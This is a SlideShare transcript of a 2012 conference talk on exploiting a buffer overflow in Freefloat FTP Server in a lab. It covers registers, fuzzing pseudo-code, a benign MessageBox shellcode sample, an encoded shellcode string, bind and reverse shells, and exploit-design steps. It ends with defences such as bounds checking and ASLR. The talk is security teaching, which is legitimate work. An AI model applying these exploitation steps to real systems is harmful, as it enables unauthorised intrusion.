Anatomy of a Buffer  Overflow Attack     Rob Gillen       @argodev
CodeStock is proudly partnered with:                RecruitWise and Staff with Excellence - www.recruitwise.jobs      Send...
Don’t Be StupidThe following presentation describesreal attacks on real systems. Pleasenote that most of the attacksdescri...
DisclaimerThe content of this presentationrepresents my personal views andthoughts at the present time. Thiscontent is not...
CreditsThe vulnerability that we’ll be discussingwas initially discovered by C4SS!0 G0M3S(louredo_@hotmail.com) and was pu...
Example Overview• Scenario  – Machine 1: BackTrack 5 SR1  – Machine 2:    • Windows 7 Professional x64, SP1,      fully pa...
Attack Process• Identify target of interest• Identify software/versions being  used• Setup local Instance• Fuzz to identif...
Terminology•   CPU Registers•   Assembler Debugger•   Buffer Overflows•   Fuzzing•   Shellcode•   Encoding•   Bind Shell/R...
CPU Registers (8086)•   EAX    –   Accumulator Register•   EBX    –   Base Register•   ECX    –   Counter Register•   EDX ...
CPU Registers (8086)• EIP – program counter or commonly  “instruction pointer” – a processor  register that indicates wher...
Assembler Debugger
Buffer Overflow• Software accepts input, but doesn’t ensure  that it is only as long as supported.• In this case, software...
Fuzzing• Identify points where application  or service accepts data• Send varying lengths/types of data  until we crash th...
Shellcode• Small piece of code used as the  payload in the exploitation of a  software vulnerability• Name comes from the ...
Shellcode Example[BITS 32]mov ebx, 0x00424F52push ebxmov esi, espxor eax, eaxpush eaxpush esipush esipush eaxmov eax, 0x7E...
[BITS 32]mov ebx, 0x00424F52 ; Loads a null-terminated string “ROB” to                      ebxpush ebx            ; pushe...
Shellcode ExampleBB 52 4F 42 00 53 89 E631 C0 50 56 56 50 B8 8A05 45 7E FF D0
Encoding• There are often restrictions as to  what data can be sent via the  exploit (NULLs, etc.)• Self-extracting (small...
Encoded Shellcodexbex13xafx49x81xdaxc7xd9x74x24xf4x58x31xc9xb1x06x83xe8xfcx31x70x0fx03x70x1cx4dxbcx3ax70xdex7dx3dx27x69x67...
Bind Shell/Reverse Shell• Bind Shell  – Target exposes a shell on a given port  – Attacker connects to that port and    ex...
Bind Shell Code executes ontarget and exposes  a listener on a       Attacker connects   specific port        (Binds) to c...
Reverse Shell                                      Attacker exposes                                      a listener on a  ...
Fuzzing Pseudo-Code• Build array of increasing length  strings (“A”)• Build array of valid commands• For each command in a...
DemonstrationFUZZING THE SERVICE
Design The Exploit• Iterate with various malicious  buffer sizes to see how much space  is available• Locate where within ...
Design The Exploit• Select / configure / encode  shellcode• Integrate into exploit script (NOP  slide, breakpoints, etc)• ...
DemonstrationDESIGNING THE EXPLOIT
Solutions?• Bounds checking is critical!• Fuzz your own applications• Address Space Layout Randomization  (ASLR)• Operatin...
Questions/ContactRob Gillenrob@gillenfamily.nethttp://rob.gillenfamily.net@argodev
Anatomy of a Buffer Overflow Attack
Upcoming SlideShare
Loading in...5
×

Anatomy of a Buffer Overflow Attack

1,845

Published on

Slides from my talk at CodeStock 2012 describing the process of exploiting a buffer overflow vulnerability.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,845
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Anatomy of a Buffer Overflow Attack"

  1. 1. Anatomy of a Buffer Overflow Attack Rob Gillen @argodev
  2. 2. CodeStock is proudly partnered with: RecruitWise and Staff with Excellence - www.recruitwise.jobs Send instant feedback on this session via Twitter: Send a direct message with the room number to @CodeStock d codestock 413a This session is great! For more information on sending feedback using Twitter while at CodeStock, please see the “CodeStock README” in your CodeStock guide.
  3. 3. Don’t Be StupidThe following presentation describesreal attacks on real systems. Pleasenote that most of the attacksdescribed would be considered ILLEGALif attempted on machines that you donot have explicit permission to testand attack. I assume no responsibilityfor any actions you perform based onthe content of this presentation orsubsequent conversations. Pleaseremember this basic guideline: Withknowledge comes responsibility.
  4. 4. DisclaimerThe content of this presentationrepresents my personal views andthoughts at the present time. Thiscontent is not endorsed by, orrepresentative in any way of myemployer nor is it intended to be aview into my work or a reflection onthe type of work that I or my groupperforms. It is simply a hobby andpersonal interest and should beconsidered as such.
  5. 5. CreditsThe vulnerability that we’ll be discussingwas initially discovered by C4SS!0 G0M3S(louredo_@hotmail.com) and was publishedon June 17, 2011.http://www.exploit-db.com/exploits/17539/James Fitts created a MetaSploit modulethat I also reviewed while building thismodulehttp://www.exploit-db.com/exploits/17540/
  6. 6. Example Overview• Scenario – Machine 1: BackTrack 5 SR1 – Machine 2: • Windows 7 Professional x64, SP1, fully patched • Freefloat FTP Server v1.0• Tasks – Discover a vulnerability exists – Craft & test an exploit• Goal: Obtain reverse shell
  7. 7. Attack Process• Identify target of interest• Identify software/versions being used• Setup local Instance• Fuzz to identify vulnerability• Design/Develop Exploit• Test• Package/Weaponize
  8. 8. Terminology• CPU Registers• Assembler Debugger• Buffer Overflows• Fuzzing• Shellcode• Encoding• Bind Shell/Reverse Shell
  9. 9. CPU Registers (8086)• EAX – Accumulator Register• EBX – Base Register• ECX – Counter Register• EDX – Data Register• ESI – Source Index• EDI – Destination Index• EBP – Base Pointer• ESP – Stack Pointer Content from: http://www.swansontec.com/sregisters.html
  10. 10. CPU Registers (8086)• EIP – program counter or commonly “instruction pointer” – a processor register that indicates where a computer is in its program sequence.• Holds the memory address of (“points to”) the next instruction that would be executed.• Any thoughts on why this specific register is particularly interesting? Content from: http://en.wikipedia.org/wiki/Instruction_pointer
  11. 11. Assembler Debugger
  12. 12. Buffer Overflow• Software accepts input, but doesn’t ensure that it is only as long as supported.• In this case, software accepts a value into the variable A, but the user sends an overly-long string (“excessive”) and overflows the space allocated to A and overwrites the integer previously stored in B Content from: http://en.wikipedia.org/wiki/Buffer_overflow
  13. 13. Fuzzing• Identify points where application or service accepts data• Send varying lengths/types of data until we crash the service and/or overwrite key buffers.• Increase buffer length until no longer successful (identify upper bounds of memory space available for exploit)
  14. 14. Shellcode• Small piece of code used as the payload in the exploitation of a software vulnerability• Name comes from the purpose – usually spawns a shell and performs some action• Often written in assembly code• Types: – “normal”, Staged, Egg-hunt, Omelette Content from: http://en.wikipedia.org/wiki/Shellcode
  15. 15. Shellcode Example[BITS 32]mov ebx, 0x00424F52push ebxmov esi, espxor eax, eaxpush eaxpush esipush esipush eaxmov eax, 0x7E45058Acall eax
  16. 16. [BITS 32]mov ebx, 0x00424F52 ; Loads a null-terminated string “ROB” to ebxpush ebx ; pushes ebx to the stackmov esi, esp ; saves null-terminated string “ROB” in esixor eax, eax ; Zero our eax (eax=0)push eax ; Push the fourth parameter (uType) to the stack (value 0)push esi ; Push the third parameter (lpCaption) to the stack (value ROB00)push esi ; Push the second parameter (lpText) to the stack (value ROB00)push eax ; Push the first parameter (hWnd) to the stack (value 0)mov eax, 0x7E45058A ; Move the MessageBoxA address in to eaxcall eax ; Call the MessageBoxA function with all parameters supplied.
  17. 17. Shellcode ExampleBB 52 4F 42 00 53 89 E631 C0 50 56 56 50 B8 8A05 45 7E FF D0
  18. 18. Encoding• There are often restrictions as to what data can be sent via the exploit (NULLs, etc.)• Self-extracting (smaller shellcode)• Self-decrypting (avoid IDS signatures)• Tools such as msfencode offer many options.
  19. 19. Encoded Shellcodexbex13xafx49x81xdaxc7xd9x74x24xf4x58x31xc9xb1x06x83xe8xfcx31x70x0fx03x70x1cx4dxbcx3ax70xdex7dx3dx27x69x67x0cx07x39x3ex39xd7x02x34xc0x92x0cxb6x1b
  20. 20. Bind Shell/Reverse Shell• Bind Shell – Target exposes a shell on a given port – Attacker connects to that port and executes commands – Remote Administration• Reverse Shell – Attacker listens for connections on a given port – Shell code on target connects to attacker and sends a shell – NAT-safe
  21. 21. Bind Shell Code executes ontarget and exposes a listener on a Attacker connects specific port (Binds) to client (i.e. 4444) ip:4444 Attacker Target sends shell to attacker Target
  22. 22. Reverse Shell Attacker exposes a listener on a specific port (i.e. 4444) Code executes on target and connects to the attacker ip:4444 Attacker Target sends shellTarget to attacker
  23. 23. Fuzzing Pseudo-Code• Build array of increasing length strings (“A”)• Build array of valid commands• For each command in arrayOfCommands – For each string in arrayOfStrings • Establish FTP connection • Submit command + string• Watch for application hang/crash• Inspect register values/pointers
  24. 24. DemonstrationFUZZING THE SERVICE
  25. 25. Design The Exploit• Iterate with various malicious buffer sizes to see how much space is available• Locate where within the evil buffer we actually overwrite EIP• Locate where within the evil buffer we can locate our shellcode (pointed to by other register)
  26. 26. Design The Exploit• Select / configure / encode shellcode• Integrate into exploit script (NOP slide, breakpoints, etc)• Identify reusable jump address to consistently move to shellcode• Test with breakpoints• Test in “real world” scenario
  27. 27. DemonstrationDESIGNING THE EXPLOIT
  28. 28. Solutions?• Bounds checking is critical!• Fuzz your own applications• Address Space Layout Randomization (ASLR)• Operating System Support – Data Execution Prevention
  29. 29. Questions/ContactRob Gillenrob@gillenfamily.nethttp://rob.gillenfamily.net@argodev

×